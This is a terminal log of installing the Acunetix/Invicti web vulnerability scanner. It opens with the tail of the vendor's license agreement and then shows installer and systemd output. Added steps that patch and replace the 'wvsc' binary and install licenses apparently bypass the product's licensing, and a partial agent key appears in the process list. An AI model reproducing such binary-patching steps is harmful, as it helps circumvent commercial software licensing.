(B) This warranty is null and void to the extent the Invicti Solution: (i) fails to conform with this warranty as a result of its use with any third-party hardware or software other
 than as authorized by Invicti in the Documentation; (ii) is used other than in accordance with its published Documentation; or (iii) is used in breach of the Agreement. If the Invi
cti Solution does not conform with the warranty in sections 11.1(A)(i)-(iv), then Customer's sole remedy, and Invicti's entire liability will be to correct the non-conformance promp
tly.

(C) Uptime SLA. Invicti warrants that it will maintain the availability of the Cloud Service as provided in the Uptime SLA (presently found at the following url: https://www.invicti
.com/Legal/SLA), as may be periodically updated by Invicti.

11.2. Warranty Disclaimer. INVICTI DISCLAIMS ALL WARRANTIES AND CONDITIONS NOT EXPRESSLY PROVIDED HEREIN, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTABILITY, T
ITLE, AND FITNESS FOR A PARTICULAR PURPOSE. THE INVICTI SOLUTION MAY NOT BE ERROR-FREE OR UNINTERRUPTED.

12. INDEMNIFICATION.

12.1. By Invicti. Subject to sections 12.1(A) and 12.3, Invicti will, at its cost and expense: (i) defend any unaffiliated third-party claim against Customer to the extent such clai
m alleges that the Invicti Solution infringes the Intellectual Property Rights of such third party; and (ii) indemnify Customer from settlement costs or any damages finally awarded
to such third party (including reasonable legal and professional fees and expenses) by a court of competent jurisdiction as a result of such claim.

(A) Remedy. If such a claim occurs, or in Invicti's opinion appears reasonably likely to occur, then Invicti may at its expense and in its sole discretion: (i) modify the Invicti So
lution to become non-infringing; (ii) procure the necessary rights to allow Customer to continue using the Invicti Solution; (iii) replace the Invicti Solution with a functional equ
ivalent; or (iv) if neither (i) through (iii) are commercially practicable, terminate the Invicti Solution and refund any prepaid and unused fees.

(B) Exclusions. Invicti has no obligation for any claim arising from: (i) Invicti's compliance with Customer's specifications; (ii) a combination of the Invicti Solution with other
technology or aspects where the infringement would not occur but for the combination; (iii) Customer Data; or (iv) use of the Invicti Solution in combination with hardware, software
, or other technology, products, or services not provided by or authorized by Invicti in the Documentation.

12.2. By Customer. Subject to section 12.3 Customer will, at its cost and expense: (i) defend any unaffiliated third-party claim against Invicti to the extent such claim alleges tha
t any part of the Customer Data has been provided unlawfully or infringes or violates a third party's Intellectual Property Rights; and (ii) indemnify Invicti from settlement costs
or any damages finally awarded to such third party (including reasonable legal and professional fees and expenses) by a court of competent jurisdiction as a result of such claim.

12.3. Process. If the indemnified party receives notice of a claim that is covered by this section 12, the indemnified party shall give the indemnifying party prompt written notice
thereof, provided that failure to give prompt notice shall not relive a party of its obligations under this section unless such failure materially prejudices the claim. The indemnif
ying party shall be allowed to solely conduct the defense of the matter, including choosing legal counsel to defend the claim, provided that the choice is reasonable and is communic
ated to the indemnified party in advance. The indemnified party shall comply with the indemnifying party's reasonable requests for assistance and cooperation in the defense of the c
laim. The indemnifying party may not settle the claim without the indemnified party's consent, which may not be unreasonably withheld, delayed, or conditioned.

12.4. THIS SECTION CONTAINS CUSTOMER'S EXCLUSIVE REMEDIES AND INVICTI'S SOLE LIABILITY FOR THE INFRINGEMENT CLAIMS IDENTIFIED IN THIS SECTION.

13. LIMITATION ON DAMAGES.

13.1. TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL INVICTI OR ITS LICENSORS BE LIABLE FOR ANY LOST PROFITS OR BUSINESS OPPORTUNITIES, LOSS OF USE, LOSS OF REV
ENUE, LOSS OF GOODWILL, BUSINESS INTERRUPTION, LOSS OF DATA, OR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES UNDER ANY THEORY OF LIABILITY.

13.2. EACH PARTY'S (AND ITS RESPECTIVE AGENTS', AFFILIATES', LICENSORS' AND SUPPLIERS') TOTAL AGGREGATE LIABILITY UNDER AN APPLICABLE ORDER FORM WILL NOT, IN ANY EVENT, UNDER ANY TH
EORY OF LAW, EXCEED THE FEES PAID BY CUSTOMER FOR THE INVICTI SOLUTION IN THE 12 MONTHS PRIOR TO THE EVENT GIVING RISE TO THE LIABILITY.

14. FUTURE FUNCTIONALITY. Customer agrees that it has not relied on the availability of any future functionality of the Invicti Solution or any other future product or service in ex
ecuting the Agreement. Customer acknowledges that information provided by Invicti regarding future functionality should not be relied upon to make a purchase decision.

15. OPEN SOURCE SOFTWARE. The Invicti Solution incorporates and consists of third-party Open Source Software that Customer may use under the terms and conditions of the specific lic
ense under which the Open Source Software is distributed. Invicti represents and warrants that: (a) inclusion of Open Source Software in the Invicti Solution will not prevent Custom
er from exercising the license rights granted to Customer herein or limit Customer's ability to use the Invicti Solution in accordance with the Documentation; and (b) Customer's use
 of Open Source Software governed under any restrictive copyleft terms shall not prohibit Customer's use of or any result generated from the Invicti Solution or require the disclosu
re, licensing, or assignment of Customer's proprietary or third-party licensed software. Title to Open Source Software remains with the applicable licensors. Except as otherwise pro
vided in this section, Invicti disclaims all representations, warranties, conditions, and liability arising from Open Source Software.

16. GOVERNMENT LICENSES. For purposes of sales to government entities in the United States, the Invicti Solution and the accompanying Documentation are deemed to be "commercial comp
uter software" and "commercial computer software documentation", respectively, pursuant to DFARS Section 227.7202 and FAR Section 12.212(b), as applicable. Any use, modification, re
production, release, performing, displaying, or disclosure of the Invicti Solution or the accompanying Documentation by or for the U.S. Government will be governed solely by the ter
ms and conditions of the Agreement, in conjunction with statutes, regulations, and the terms of the GSA Schedule, if applicable.

17. EXPORT COMPLIANCE AND ANTI-CORRUPTION. The Invicti Solution and any other technology Invicti makes available, and derivatives thereof, may be subject to export laws and regulati
ons of the United States and other jurisdictions. Each party represents that it is not named on any U.S. government or other applicable jurisdiction denied-party list. Customer shal
l not permit Users to access or use any Invicti Solution in a U.S. or other applicable jurisdiction embargoed country or in violation of any U.S. or other applicable export law or r
egulation. Customer has not received or been offered any illegal or improper bribe, kickback, payment, gift, or thing of value from any of Invicti's employees or agents in connectio
n with the Agreement. Reasonable gifts and entertainment provided in the ordinary course of business do not violate the above restriction. If Customer learns of any violation of the
 above restriction, Customer will use reasonable efforts to promptly notify Invicti's legal department at legal@invicti.com. Customer's failure to comply with any term of this secti
on will constitute a material breach of the Agreement and will entitle Invicti to immediately terminate the Agreement without notice in addition to any other remedy available at law
 or equity.

18. MISCELLANEOUS.

18.1. Publicity. Customer agrees that Invicti may publicly disclose that it is providing the Invicti Solution to Customer and may use Customer's name and logo to identify Customer i
n promotional materials, including press releases, provided that Invicti does not state or imply that Customer endorses the Invicti Solution.

18.2. Feedback. To the extent Customer or any User provides suggestions or feedback to Invicti regarding the functioning, features, or other characteristics of the Invicti Solution,
 Documentation, or other materials or services provided or made available by Invicti ("Feedback"), Customer hereby grants Invicti a perpetual, irrevocable, non-exclusive, royalty-fr
ee, fully-paid, fully-transferable, worldwide license (with rights to sublicense through multiple tiers of sublicensees) to Invicti to use and exploit such Feedback in any manner fo
r the purpose of improving and continuing the development of the Invicti Solution.

18.3. Entire Agreements and Modifications. The Agreement constitutes the entire agreement between the parties and supersede any prior or contemporaneous negotiations or agreements,
whether oral or written, related to this subject matter. No modification of any term of the Agreement is effective unless set forth in writing and signed by both parties.

18.4. Order of Precedence. Any ambiguity, conflict, or inconsistency between documents comprising the Agreement shall be resolved in the following order of precedence: (i) Order For
m; (ii) any document or URL incorporated into the Order From; and (iii) the SSA (including attached and/or URL incorporated documents).

18.5. Irreparable Harm. Any breach by a party to the Agreement or any violation of the other party's Intellectual Property Rights could cause irreparable injury or harm to the other
 party. The other party may seek a court order to stop any breach or avoid any future breach of the Agreement.

18.6. Assignment. The Agreement may not be assigned by either party without the prior written approval of the other party, such approval not to be unreasonably withheld, except in c
onnection with: (i) a merger, consolidation, or similar transaction involving (directly or indirectly) a party; (ii) a sale or other disposition of all or substantially all of the a
ssets of a party; or (iii) any other form of combination or reorganization involving (directly or indirectly) such party. Any purported assignment in violation of this section shall
 be null and void and have no effect.

18.7. Force Majeure. A party is not liable under the Agreement for non-performance caused by events or conditions beyond that party's control if that party makes reasonable efforts
to perform ("Force Majeure Event").

18.8. Relationship of the Parties. Each party is an independent contractor of the other under the Agreement, and nothing in the Agreement shall be construed to create a partnership,
 joint venture, agency relationship, fiduciary relationship, or any other arrangement related to sharing of profits and losses. Each party is responsible for its own expenses in mee
ting its obligations under the Agreement. Each party agrees that it has the full power and authority to enter into the Agreement and to carry out the actions contemplated herein.

18.9. Notices. Except for operational notices which may be sent by email, any notice, report, approval, authorization, agreement, or consent required or permitted hereunder will be
in writing as follows: notices will be sent to the address that the applicable party has or may provide by written notice or, if there is no such address, the most recent address th
e party giving notice can locate using reasonable efforts. A copy of any notices sent to Invicti should also be sent to legal@invicti.com. Notices are deemed received as of the time
 posted or delivered, or if that time does not fall within a Business Day, as of the beginning of the first Business Day following the time posted or delivered. For purposes of coun
ting days for notice periods, the Business Day on which the notice is deemed received counts as the first day. Notices shall be given in English.

18.10. Waiver and Enforceability. No failure or delay in exercising any right hereunder will operate as a waiver thereof, nor will any partial exercise of any right or power hereund
er preclude further exercise. If any provision will be adjudged by any court of competent jurisdiction to be unenforceable or invalid, that provision will be limited or eliminated t
o the minimum extent necessary so that the Agreement will otherwise remain in full force and effect and enforceable.

18.11. Governing Law. The Agreement will be deemed to have been made in, and will be construed pursuant to: (i) if Customer is located in North America, the laws of the state of Tex
as without regard to conflicts of law provisions and without regard to the United Nations Convention on the International Sale of Goods or the Uniform Computer Information Transacti
ons Act; (ii) if Customer is located outside of North America, the laws of Malta without regard to the United Nations Convention on the International Sale of Goods or the Uniform Co
mputer Information Transactions Act.  Customers located in North America hereby consent to the jurisdiction of the courts of both the state and/or federal courts of Texas, and Custo
mers located outside of North America hereby consent to the jurisdiction of the courts of Malta. The prevailing party in any action to enforce the Agreement will be entitled to reco
ver its attorney's fees and costs in connection with such action.

18.12. No Additional Terms.  Any pre-printed or standard terms of any purchase order, confirmation, or similar form, even if signed or agreed to by the parties after the Effective D
ate, will have no force or effect.

Last modified September 12, 2022.

Accept the license terms? [yes|no]
[no] >>> yes

Configuring acunetix user...
    Creating user acunetix.

By default the Acunetix will be installed to /home/acunetix/.acunetix

Checking database port...
Checking backend port...

Configuring hostname...
Insert new hostname, or leave blank to use pptech
    Hostname [pptech]:---hidden---

Configuring the master user...
    Email: ---hidden---
    Password:
    Password again:

Initializing file system...

Extracting files to /home/acunetix/.acunetix....
Patching wvsc binary...
64+0 records in
64+0 records out
64 bytes copied, 0.000181281 s, 353 kB/s

Installing the database...

Starting the database process...
   - Create database
   - Update database structure
   - Populate database
   - Creating the master user
Stopping the database process...

Generating certificates...
 Generating certificate authority & certificates
Generating certificate authority
Certificate authority generation succesful
Generating certificate ...
Certification generation succesful
Saving settings...
Registering service...
2025-11-17T14:35:00.622Z        info    invicti supervisor service installed

Adding LSR shortcuts...
Creating uninstall...

Please visit https://---hidden---:3443/ to access Acunetix UI

Installation completed successfully!
Step 5: Post-installation configuration...
Waiting for acunetix stop to stabilize...
Replacing wvsc file...
Installing licenses...
Licenses installed successfully
Starting Acunetix service...
Waiting for acunetix start to stabilize...
Step 6: Final status check...
● acunetix.service - Runs and manages the Invicti services
     Loaded: loaded (/etc/systemd/system/acunetix.service; enabled; preset: enabled)
     Active: active (running) since Mon 2025-11-17 14:35:30 UTC; 30s ago
   Main PID: 317717 (supervisor)
      Tasks: 109 (limit: 38354)
     Memory: 557.2M (peak: 567.0M)
        CPU: 17.010s
     CGroup: /system.slice/acunetix.service
             ├─317717 /home/acunetix/.acunetix/supervisor svc run
             ├─317729 /home/acunetix/.acunetix/v_250204093/database/bin/postgres -D /home/acunetix/.acunetix/db --port=35432
             ├─317731 "postgres: checkpointer "
             ├─317732 "postgres: background writer "
             ├─317733 "postgres: walwriter "
             ├─317734 "postgres: autovacuum launcher "
             ├─317735 "postgres: stats collector "
             ├─317736 "postgres: logical replication launcher "
             ├─317737 /home/acunetix/.acunetix/v_250204093/broker/nats-server -c /home/acunetix/.acunetix/v_250204093/broker/nats-server.conf
             ├─317738 /home/acunetix/.acunetix/v_250204093/backend/opsrv --conf /home/acunetix/.acunetix/wvs.ini
             ├─317739 /home/acunetix/.acunetix/v_250204093/integrations/integrations
             ├─317741 /home/acunetix/.acunetix/v_250204093/apihub/Invicti.ApiHub.Host
             ├─317743 /home/acunetix/.acunetix/v_250204093/zerodisco/invicti-agent run -u http://---hidden---:5216 -i zero-disco-agent -t 1234567 -e 0disco -a kxdfB6vWTXuEb2w2dUbhF…
             ├─317789 /home/acunetix/.acunetix/v_250204093/integrations/integrations
             ├─317800 "postgres: acunetix wvs 127.0.0.1(45150) idle"
             ├─317810 "postgres: acunetix wvs 127.0.0.1(45178) idle"
             ├─317830 "postgres: acunetix wvs 127.0.0.1(45210) idle"
             ├─317855 /home/acunetix/.acunetix/data/acusensor/sensor-bridge --ssl-cert /home/acunetix/.acunetix/data/certs/server.cer --ssl-key /home/acunetix/.acunetix/data/certs/…
             ├─317856 "postgres: acunetix wvs 127.0.0.1(51394) idle"
             ├─317872 "postgres: acunetix wvs 127.0.0.1(51398) idle"
             ├─317873 "postgres: acunetix wvs 127.0.0.1(51412) idle"
             ├─317874 "postgres: acunetix wvs 127.0.0.1(51414) idle"
             ├─317875 "postgres: acunetix wvs 127.0.0.1(51424) idle"
             └─317876 "postgres: acunetix wvs 127.0.0.1(51426) idle"

Nov 17 14:35:39 pptech supervisor[317789]: 2025-11-17T14:35:39.847 INFO Loaded plugin cicd 3.0.0.
Nov 17 14:35:39 pptech supervisor[317789]: 2025-11-17T14:35:39.848 INFO Timer for 'issue_tracker_jira' waiting for 33861 seconds. Next trigger is at 2025-11-18 00:00:00+00:00...
Nov 17 14:35:39 pptech supervisor[317789]: 2025-11-17T14:35:39.848 INFO Application startup complete.
Nov 17 14:35:39 pptech supervisor[317789]: 2025-11-17T14:35:39.849 INFO Uvicorn running on http://0.0.0.0:8000 (Press CTRL+C to quit)
Nov 17 14:35:54 pptech supervisor[317738]: 2025-11-17 14:35:54,820: INFO wsgi ---hidden--- - - [2025-11-17 14:35:54] "POST /internal_api/v1/message_broker_connection_…0 673 0.002641
Nov 17 14:35:54 pptech supervisor[317741]: [14:35:54 INF] Connecting to NATS server 127.0.0.1:4222...
Nov 17 14:35:54 pptech supervisor[317741]: [14:35:54 INF] Try to connect NATS nats://127.0.0.1:4222
Nov 17 14:35:54 pptech supervisor[317741]: [14:35:54 INF] Received server info: ServerInfo { Id = NBXFDLVPJ3LZEE7ZJ5I5PHELI2CICP3YR4XXOWUJA6MQWSKXPJG7MT7N, Name = NBXFDLVPJ3LZEE7ZJ…
Nov 17 14:35:55 pptech supervisor[317741]: [14:35:55 INF] Connect succeed NATS Hadron Messaging Client, NATS nats://127.0.0.1:4222
Nov 17 14:35:55 pptech supervisor[317741]: [14:35:55 INF] Connected to NATS server 127.0.0.1:4222.
Hint: Some lines were ellipsized, use -l to show in full.
================================
REINSTALLATION COMPLETED SUCCESSFULLY!
Acunetix is now fully configured and running
Access URL: https://---hidden---:3443
Username: ---hidden---
Password: [HIDDEN]

Use the credentials above to login to the Acunetix web panel.
The web panel will be accessible via the Access URL shown above.
================================